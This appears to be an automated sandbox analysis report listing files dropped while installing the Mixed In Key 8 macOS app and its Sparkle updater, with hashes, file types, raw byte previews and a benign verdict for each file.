                                                                                                    SHA-512:E8BA9CAA08638A7EF754766C529C55DB0FFF0C5689AAD2BFB24A250C5BCA35AEFF04FFA5280D9C03B21CB7C99A6895E9257D1C773B54834E7A9D784440655737
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: bplist00.................X$versionX$objectsY$archiverT$top................#.$.*...2.E.M.a.j.k.{.|.......................................................................7.=.M.Q.z.{.........................................................................$.%.*.,./.8.9.@.A.B.C.F.G.L.M.R.r.s.t.u...................................................................................$.*.+.,./.2.5.6.8.9.:.;.<.?.@.E.F.J.O.P.U.V.b.c.d.e.l.m.n.q.u.|...............................................x.`.........................................@.s._...e..............................................................................................U$null.............................................VNSRoot]NSConnections\NSOidsValues_..NSObjectsValues]NSObjectsKeys_..NSAccessibilityOidsValues_..NSVisibleWindows_..NSAccessibilityOidsKeys_..NSAccessibilityConnectorsV$classZNSOidsKeys............................ ...!."[NSClassName...._..SUUpdatePermissionPrompt..%.&.'.(Z$classnameX$classes^NSCustomObject..'.)XNSObj
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/zh_TW.lproj/.BC.T_RNSAmT
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:Apple binary property list
                                                                                                    Size (bytes):12044
                                                                                                    Entropy (8bit):6.762394893179439
                                                                                                    Encrypted:false
                                                                                                    MD5:2203439210C3102A534730244CD458E3
                                                                                                    SHA1:1B51681B93D602638F4657D0A0762BDCF06CD50C
                                                                                                    SHA-256:96F3682C0FE739CD06AE9E311DC113247DABB9DE599C8FA64309215411509CAF
                                                                                                    SHA-512:199AD1289ADFCD37F5BF9776B432C1CF825D6CF13C26A746C254A738E58E83DE940EF0950F9720F1BDCBF7266840B74B6F3848F7CFC8B4619E6722B6D14A6574
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: bplist00.................X$versionX$objectsY$archiverT$top...............#.$.*...2.=.E.g.h.i.j.k.w..................................................................... .$.'.,.-.2.6.9.B.C.J.O.P.].`.a.b.v.w.{...................................................................................................$.%.&.-.../.D.G.H.J._.}.f.b........................................................U$null.............................................VNSRoot]NSConnections\NSOidsValues_..NSObjectsValues]NSObjectsKeys_..NSAccessibilityOidsValues_..NSVisibleWindows_..NSAccessibilityOidsKeys_..NSAccessibilityConnectorsV$classZNSOidsKeys.........|.............. ...!."[NSClassName...._..SUAutomaticUpdateAlert..%.&.'.(Z$classnameX$classes^NSCustomObject..'.)XNSObject..+...,.-ZNS.objects.....%.&./.0\NSMutableSet../.1.)UNSSet..+...3.<..4.5.6.7.8.9.:.;...e.h.j.l.s.v.y....>.?.@.....B.C.DXNSSource]NSDestinationWNSLabel.....c.d....F.G.H.I.J.K.L.M.N.O...P.Q.R.S.T.U.V.W.X.Y.Z.[.\.].]._.`.a.b.c.d.W.f\NSWindowRect_..N
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/_CodeSignature/.BC.T_MuPpul
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:XML document text
                                                                                                    Size (bytes):69143
                                                                                                    Entropy (8bit):5.1786266078313945
                                                                                                    Encrypted:false
                                                                                                    MD5:374DF1C3E1CF9CB2EA6116BC1513EAAC
                                                                                                    SHA1:7ACF8F80812CE065DB88B68393BA10FD64D175C2
                                                                                                    SHA-256:77438F2AA469BE3D2A07EE1A2A96FC92EAB87AC85B73A5F92B14F5BC07CDC732
                                                                                                    SHA-512:C076F18CCAEBACC15664AB5001BF1C9017E02FAD10F436EF57A367378AFB9A8BEAAA5EDFB414700440ECFE209CDAF5D139FE4C5B8A2980AC2703C82C7A357FE1
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: <?xml version="1.0" encoding="UTF-8"?>.<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">.<plist version="1.0">.<dict>..<key>files</key>..<dict>...<key>Resources/Autoupdate.app/Contents/Info.plist</key>...<data>...O92EYJpsmyRV92gaoHI05SUu4Yw=...</data>...<key>Resources/Autoupdate.app/Contents/MacOS/Autoupdate</key>...<data>...pLw/qUlQfkua1xZ8CEAEwH4oGqM=...</data>...<key>Resources/Autoupdate.app/Contents/PkgInfo</key>...<data>...n57qDP4tZfLD1rCS43W0B4LQjzE=...</data>...<key>Resources/Autoupdate.app/Contents/Resources/SUStatus.nib</key>...<data>...sYsx+yJdk7U5jlaT5UjkYAO2vYY=...</data>...<key>Resources/Autoupdate.app/Contents/Resources/Sparkle.icns</key>...<data>...RAPi1GDm7RjA+JlOSVD1eYK+1VA=...</data>...<key>Resources/Autoupdate.app/Contents/Resources/ar.lproj/Sparkle.strings</key>...<dict>....<key>hash</key>....<data>....3lN5msMrnMK9Fubf02YF5yyKp7U=....</data>....<key>optional</key>....<true/>...</dict>...<key>Resources/Autoupdate.a
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Resources/.BC.T_KvHEiV
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:XML document text
                                                                                                    Size (bytes):1339
                                                                                                    Entropy (8bit):5.223322615990858
                                                                                                    Encrypted:false
                                                                                                    MD5:CA1EB7CC41599164BE8E346458F732E8
                                                                                                    SHA1:7882999B1DEFD773668B87A364D1844A731F2F60
                                                                                                    SHA-256:CD377A165AB4CB5909B5EBA7329E88EDB05278FB70C1550BAC4AB70499802E77
                                                                                                    SHA-512:EA22401F4169C1C9AA3E675DC9CAB208F5A992ADD6AE14E26011473B63FA7AF8A9B4A136501AC2EB4FFBE7F25D2A2E441CC29003BF94773EC642FEE6E831F6C7
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: <?xml version="1.0" encoding="UTF-8"?>.<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">.<plist version="1.0">.<dict>..<key>BuildMachineOSBuild</key>..<string>18G95</string>..<key>CFBundleDevelopmentRegion</key>..<string>en</string>..<key>CFBundleExecutable</key>..<string>MIKUpdate</string>..<key>CFBundleIdentifier</key>..<string>com.mixedinkey.MIKUpdate</string>..<key>CFBundleInfoDictionaryVersion</key>..<string>6.0</string>..<key>CFBundleName</key>..<string>MIKUpdate</string>..<key>CFBundlePackageType</key>..<string>FMWK</string>..<key>CFBundleShortVersionString</key>..<string>1.0</string>..<key>CFBundleSignature</key>..<string>????</string>..<key>CFBundleSupportedPlatforms</key>..<array>...<string>MacOSX</string>..</array>..<key>CFBundleVersion</key>..<string>1</string>..<key>DTCompiler</key>..<string>com.apple.compilers.llvm.clang.1_0</string>..<key>DTPlatformBuild</key>..<string>9F2000</string>..<key>DTPlatformVersion</key>..<st
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/.BC.T_c0odLt
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:XML document text
                                                                                                    Size (bytes):1449
                                                                                                    Entropy (8bit):5.1643819237088024
                                                                                                    Encrypted:false
                                                                                                    MD5:3B5D2964FDEF83DEE7D46AF524DF419E
                                                                                                    SHA1:AC1F3B64170E58E9D48B102449E9BA1BB2A94938
                                                                                                    SHA-256:A47B28BDD0152C69BD257B13335F3EB32D52C0F297FDFE8B8365A8095C132CD2
                                                                                                    SHA-512:9E26F3EC522BDD128B3DB0A2E08D99FD0E209A2A918EE8D7608FCC9889522A0ED85857AB7BA90F4218A8A7991D098FF071D5C7A7A09CD8A1A8B3645D5FC2E618
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: <?xml version="1.0" encoding="UTF-8"?>.<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">.<plist version="1.0">.<dict>..<key>BuildMachineOSBuild</key>..<string>18G95</string>..<key>CFBundleDevelopmentRegion</key>..<string>English</string>..<key>CFBundleExecutable</key>..<string>com.andymatuschak.Sparkle.SandboxService</string>..<key>CFBundleIdentifier</key>..<string>com.andymatuschak.Sparkle.SandboxService</string>..<key>CFBundleInfoDictionaryVersion</key>..<string>6.0</string>..<key>CFBundleName</key>..<string>com.andymatuschak.Sparkle.SandboxService</string>..<key>CFBundlePackageType</key>..<string>XPC!</string>..<key>CFBundleShortVersionString</key>..<string>1.0</string>..<key>CFBundleSignature</key>..<string>????</string>..<key>CFBundleSupportedPlatforms</key>..<array>...<string>MacOSX</string>..</array>..<key>CFBundleVersion</key>..<string>1</string>..<key>DTCompiler</key>..<string>com.apple.compilers.llvm.clang.1_0</string>..<ke
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/MacOS/.BC.T_mJSjZF
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:Mach-O 64-bit executable
                                                                                                    Size (bytes):100000
                                                                                                    Entropy (8bit):5.477463069028685
                                                                                                    Encrypted:false
                                                                                                    MD5:3E296F6B3846792467DDCD65B94A84D7
                                                                                                    SHA1:3EC458CAEE7CF10192CAACB842BACEB2E1C006CB
                                                                                                    SHA-256:01EF7E4C14AE726A0D82BCC956558983E1C1D53AC9B8C119306A0685D54BA66E
                                                                                                    SHA-512:26D33DA5408B5966A186F5D8B37968D0883532F52E11A63B73F52734592DC8E0DCBCDE1EC5BD382606AB664371A0CCEF007F25C4A9D5BFB59FC9D31246F3EE8C
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ....................h..... .........H...__PAGEZERO..............................................................__TEXT..........................................................__text..........__TEXT...................O......................................__stubs.........__TEXT...........b...............b..............................__stub_helper...__TEXT...........d......X........d..............................__gcc_except_tab__TEXT..........\g..............\g..............................__objc_methname.__TEXT...........g...............g..............................__cstring.......__TEXT..........ps..............ps..............................__objc_classname__TEXT..........c}..............c}..............................__objc_methtype.__TEXT...........}...............}..............................__const.........__TEXT...........~...............~..............................__unwind_info...__TEXT..................<.......................................__eh_frame......__TEXT..
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/.BC.T_W2qavB
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:XML document text
                                                                                                    Size (bytes):1514
                                                                                                    Entropy (8bit):5.131381869858746
                                                                                                    Encrypted:false
                                                                                                    MD5:327891A0C12C865E4533B1468092F6C8
                                                                                                    SHA1:3BDD84609A6C9B2455F7681AA07234E5252EE18C
                                                                                                    SHA-256:E092DCAA8DCDABA9ACDC861F77F1C2C252055B8BDA3B120A76AE0891395D5BF8
                                                                                                    SHA-512:7103096A1639BABD99F0DC2BFE13898C20417C4EEC548B95CCC2B6103188B9E8624C6D96ACBD409079821467EE8F68AF2FC80A2EBFB9C325FE5589E64FCA1F4B
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: <?xml version="1.0" encoding="UTF-8"?>.<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">.<plist version="1.0">.<dict>..<key>BuildMachineOSBuild</key>..<string>18G95</string>..<key>CFBundleDevelopmentRegion</key>..<string>English</string>..<key>CFBundleExecutable</key>..<string>Autoupdate</string>..<key>CFBundleIconFile</key>..<string>Sparkle</string>..<key>CFBundleIdentifier</key>..<string>org.andymatuschak.sparkle.Autoupdate</string>..<key>CFBundleInfoDictionaryVersion</key>..<string>6.0</string>..<key>CFBundlePackageType</key>..<string>APPL</string>..<key>CFBundleShortVersionString</key>..<string>1.6</string>..<key>CFBundleSignature</key>..<string>????</string>..<key>CFBundleSupportedPlatforms</key>..<array>...<string>MacOSX</string>..</array>..<key>CFBundleVersion</key>..<string>1.6</string>..<key>DTCompiler</key>..<string>com.apple.compilers.llvm.clang.1_0</string>..<key>DTPlatformBuild</key>..<string>9F2000</string>..<key>DTPlat
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/.BC.T_rL0Yor
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Size (bytes):8
                                                                                                    Entropy (8bit):1.75
                                                                                                    Encrypted:false
                                                                                                    MD5:23B7D7D024ABB0F558420E098800BF27
                                                                                                    SHA1:9F9EEA0CFE2D65F2C3D6B092E375B40782D08F31
                                                                                                    SHA-256:82502191C9484B04D685374F9879A0066069C49B8ACAE7A04B01D38D07E8ECA0
                                                                                                    SHA-512:F77D501528DD0CED155C80406CFBEE38D5D3649B64D2A9324F3D6CEE39491EB8F54CDEBAE49C6E21A20D2309D8FAE1B01C41631224811E73483DB25A2695738C
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: APPL????
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/MacOS/.BC.T_4kpeZa
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:Mach-O 64-bit executable
                                                                                                    Size (bytes):99348
                                                                                                    Entropy (8bit):5.45642914306039
                                                                                                    Encrypted:false
                                                                                                    MD5:8245D6DB0EB9AC156D8A62AD7F7ACEC1
                                                                                                    SHA1:3EEB772BEDA6556704D9E5CF4C902AC03EEA80B7
                                                                                                    SHA-256:CC53079A1A7E6D50F713DD3445CC8E646BC7DA12153CF34A6D518A7EF82911BF
                                                                                                    SHA-512:19F6912B279745A70F175B218B94AA885163E2DF90C991D352F4882E3A93282BB24F4165704B3C052D58F7A1504319DD4A304BDAB884D9C4CB6DDF1EB004ABC0
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: .......................... .........H...__PAGEZERO..............................................................__TEXT..........................................................__text..........__TEXT..........@.......Vw......@...............................__stubs.........__TEXT..................4.......................................__stub_helper...__TEXT..........................................................__const.........__TEXT..................@.......................................__objc_methname.__TEXT..................#.......................................__cstring.......__TEXT..........................................................__objc_classname__TEXT..........................................................__objc_methtype.__TEXT..........................................................__gcc_except_tab__TEXT..........................................................__unwind_info...__TEXT..........l...............l...............................__eh_frame......__TEXT..
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/Resources/.BC.T_5jP6rP
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:data
                                                                                                    Size (bytes):41403
                                                                                                    Entropy (8bit):7.887999665341449
                                                                                                    Encrypted:false
                                                                                                    MD5:80BC51F3EC405DF93F59D53264066310
                                                                                                    SHA1:4403E2D460E6ED18C0F8994E4950F57982BED550
                                                                                                    SHA-256:D3BDF012983D7F5F40414815C3AFBB35C740D6151D628E17D7BA51491B319DBE
                                                                                                    SHA-512:C14587C4E55D2C50F1B66AE47692A373D807C6A5EB0D2E6F5D439B979101FEF1327502A69EA0B973894D80F2DD9812C080DF1522195B99E84542E80F20325DC7
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: icns....is32........+ERRE+....+a......e).../........../..T)............)..a.....ee.....e.#....nz..zn....):..............:E..............EE.............D:.......4.....:#................W............P.. ............ ...".........."... P......P .....098/........+ERRE+....+a......e).../........../..T)............)..a.....ee.....e.#....nz..zn....):..............:E..............EE.............D:.......4.....:#................W............P.. ............ ...".........."... P......P .....098/........+ERRE+....+a......e).../........../..T)............)..a.....ee.....e.#....oz..zo....):..............:E..............EE.............D:.......4.....:#................W............P.. ............ ...".........."... P......P .....098/....s8mk....................................................................................................................................................................................................................................................................il3
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/Resources/.BC.T_Caqbiw
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:Apple binary property list
                                                                                                    Size (bytes):11630
                                                                                                    Entropy (8bit):6.73082339431031
                                                                                                    Encrypted:false
                                                                                                    MD5:984722CB755E148570586FF148177FE8
                                                                                                    SHA1:B18B31FB225D93B5398E5693E548E46003B6BD86
                                                                                                    SHA-256:C5E5602B154E2A0AE88B5885DBBBD4F678F1CB2CE26E1049720C13F8462AEFEA
                                                                                                    SHA-512:25D7510BD8F2B184CD6B7E9EEA3780F544E69F662E735BDBD691D4A066207D65B9AC80879DAB3811964A6D9CB2D65357E5B526A19779A156417C449FF640BE26
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: bplist00.................X$versionX$objectsY$archiverT$top...............#.$.*...2.@.H.^.f.i.m.n.o...........................................................................(.../.0.3.6.9.C.D.N.O.S.T.^._.`.i.p.t.x.|.....................................................................................................!.".$.3.N.....f.i.j.[.k.l.m.n.o.p.q.r.s.t.u.v.w.x.y.z.{.|.}....U$null.............................................VNSRoot]NSConnections\NSOidsValues_..NSObjectsValues]NSObjectsKeys_..NSAccessibilityOidsValues_..NSVisibleWindows_..NSAccessibilityOidsKeys_..NSAccessibilityConnectorsV$classZNSOidsKeys.......~.z.............. ...!."[NSClassName...._..SUStatusController..%.&.'.(Z$classnameX$classes^NSCustomObject..'.)XNSObject..+...,.-ZNS.objects.....%.&./.0\NSMutableSet../.1.)UNSSet..+...3.?..4.5.6.7.8.9.:.;.<.=.>..... .[.`.g.k.o.r.t.w....A.B.C.....E.F.GXNSSource]NSDestinationWNSLabel..........I.J.K.L...M.N.O.P.Q.R.S.T.U.V.W.X.Y.Y.[.\.]VNSCellWNSFrame_..NSAllowsLogicalLayoutDirect
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/Resources/ar.lproj/.BC.T_0lCKB4
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:Little-endian UTF-16 Unicode text, with very long lines, with no line terminators
                                                                                                    Size (bytes):4602
                                                                                                    Entropy (8bit):5.263034756225517
                                                                                                    Encrypted:false
                                                                                                    MD5:70B63D2A826BE40731A075A87C47F03F
                                                                                                    SHA1:DE53799AC32B9CC2BD16E6DFD36605E72C8AA7B5
                                                                                                    SHA-256:8C94A102BD24971BF312D36BEBC3CD67DA6328EC257CF0F59E275B2548CA4E5D
                                                                                                    SHA-512:AE52D660429F0891DC050467353A06403785CBDB2A0FA913A9E83463EE905E6083EBF0F042A2E2E0948DE45E55C8136F7C71E73D9C88431107B4BA3507DF8F83
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ..%"$1 @2%@$h sab ee nodnwoldadea dni serda yotu es !oWlu doy uilekt onitsla ltia dnr leuacn h1%@$n wo"?= " ..... ........ .1%@$% $2 @....... ...... ...................... .. .......... .......... ................ .......... ...........% $1 @..........;"..%"$1 @ac'n tebu dptadew eh ntis'r nuingnf or m aerdao-ln yovuleml ki e aidksi amego rnao tpcilad irev .oMev% $1 @oty uo rpAlpcitaoisnf loed,rr leuacn htif or mhtre,ea dnt yra agni".= " ..... ...... ...........% $1 @....... ........ ...... ...... ............ ............ ........ ........ ........ .. .......... ............ ............... .........% $1 @....... ...... .................... ...... .............. .. .......... .. .......... ............;"..%" @@%i sucrrnelt yht eenewtsv reisnoa avlibael".= " ..............% $2 @..... ...... ............ ........ .............. .......... .1%@$;"..%" @@%i son wvaiaallb-ey-uoh va e@% .oWlu doy uilekt oodnwoldai ton?w " =."...... ...............% $3 @..... ........ .1%@$... .. .....
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/Resources/ca.lproj/.BC.T_RAimHn
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:Little-endian UTF-16 Unicode text, with very long lines, with no line terminators
                                                                                                    Size (bytes):2830
                                                                                                    Entropy (8bit):4.824854318221833
                                                                                                    Encrypted:false
                                                                                                    MD5:9F1ABCCE61E95FCAE31FB24A85033AB6
                                                                                                    SHA1:EBFB357848D6657B8BDA738D8FF7BE1814298303
                                                                                                    SHA-256:60BABDFAC90136E17B9994D2A835BC95031093BA62A1C743B5F63F0A3405522F
                                                                                                    SHA-512:2552AF5F9B175CACABE0F2970D1B579353215D3A0E55AFFE427338F36E4B015C63EA9EFBC85386D3895F8E3EB8399644B901E39FB933EF59106400B9F0442D6A
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ..%" @fo% "@= " 1%@$d e2%@$;"..%"$1 @ac'n tebu dptadew eh ntis'r nuingnf or m aidksi ameg .oMev% $1 @oty uo rpAlpcitaoisnf loed,rr leuacn hti ,na drt ygaia.n " =%"$1 @one sop tcautlatiaz ruqnaf nuicno aed s'dnud si c'dmitaeg .oMev u1%@$a lovtserd riceotirA lpcicaoisn ,erniciei-uol , iotnruea p orav-roh"..;".@%% @ah sebnei snatlldea dnw li lebr aeydt osu eentxt mi e@%s attr!sW uodly uol ki eotr leuacn hon?w " =%" @@%h aseat tnitsla..al t iseat.r .llse tep r aes rtulitiaz talp oreparv geda auq e'snici.i .@% !oVel uerniciai rra?a;"..%" @@%i sucrrnelt yht eenewtsv reisnoa avlibael".= " @%% @.. salv reis..d siopinlb e.ms.a tcau.l;"..%" @@%i son wvaiaallb ey(uoh va e@%.)W uodly uol ki eotd wolnao dtin wo"?= " @%% @se.t .idpsnobiel( ra aetin u@%.)V louea tcauilztra"?.;".@%d eo son tahevp reimssoi notw irett oht epalpcitaoi'n sidertcro!yA ery uor nuingno ffa d si kmiga?eI fon,ta ksy uo rystsmea mdnisirttarof roh le.p " =%" @ont ..p re.ms.p ree csirru elad riceotird a'lpcicaoisn !sE
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/Resources/cs.lproj/.BC.T_0Yowhw
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:Little-endian UTF-16 Unicode text, with very long lines, with no line terminators
                                                                                                    Size (bytes):3480
                                                                                                    Entropy (8bit):5.1493807547320705
                                                                                                    Encrypted:false
                                                                                                    MD5:689382B6730CEFDEBD3AA07DF8B4A181
                                                                                                    SHA1:EC6E96BBCD6BF225F026D84B7297CEB16CAD1C16
                                                                                                    SHA-256:B6D274FDDD401FFC6DEE2A77AEF84562B4F50BE6BC190F287031F7335C9F8FFB
                                                                                                    SHA-512:0DF3228ADBCC096FE42C780FF164E65213A28E4E66F86C8064ED65CDDD49B769F9780AB48039FBEC2980A3738C428C78169FDBB98343FA08837715C56D445D02
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ..%"$1 @2%@$h sab ee nodnwoldadea dni serda yotu es !oWlu doy uilekt onitsla ltia dnr leuacn h1%@$n wo"?= " 1%@$% $2 @yb lnitslavo.. n.aj. e.pi.rpvanek ..op.ui..t .opp .......tm.s up...tn... ..Pe.ejets ipailakic% $1 @yn.n .annitslavotaa ..nzvo upssuit?t;"..%"$1 @ac'n tebu dptadew eh ntis'r nuingnf or m aerdao-ln yovuleml ki e aidksi amego rnao tpcilad irev .oMev% $1 @oty uo rpAlpcitaoisnf loed,rr leuacn htif or mhtre,ea dnt yra agni".= " pAilakec% $1 @en.m..e.b .. tkautlazivo..an ,rpto.oe.j eps.ut...anz n zepasivotale.nh. o.md.ai ..M..e.t o.bt.C /DVD-DOR,Mo rbzad siukn be oej nen.mt. erp..ovz ..ipusn aidks ..Pe.us..eta lpkica i1%@$d oav....s ol..ykA lpkica,es up.st. eijz t hoto omu..ts..inz onuv"..;".@%% @sic ruertnylt ehn wese tevsroi nvaiaallb.e " =%"$1 @2%@$j eennjvo...j.. .odtspu.n .evzr"e.;".@%% @sin woa avlibael--oy uahev% .@W uodly uol ki eotd wolnao dtin wo"?= " eJk d siopizic% $1 @2%@$- m ..et% $3.@P ..jete eisn ny..z ok.pr.votaa tkauilazic"?.;".@%d wolnaoed"d= " kz
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/Resources/cy.lproj/.BC.T_8f5FAP
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:Little-endian UTF-16 Unicode text, with very long lines, with no line terminators
                                                                                                    Size (bytes):2424
                                                                                                    Entropy (8bit):4.717127628221706
                                                                                                    Encrypted:false
                                                                                                    MD5:FC3EA6E0077DA6182BBE7CC2FFCA1236
                                                                                                    SHA1:28DF08B4E8E111F7F02CA03F3157E2372A80C720
                                                                                                    SHA-256:2135CF24F1C452FDEFB06C5D7051ACDF4F368D1D16B114BC085BEFC089785D31
                                                                                                    SHA-512:5F7E6D12914D8F832487357716993C76D7130445FE800A7EF9E889BAFD86999E4F3D39DEEE11CBB2F4D83EAF936A47EE073CFFF7FA6FB1AA09CDEA90A2BDECA9
                                                                                                    Malicious:false
                                                                                                    Reputation:low
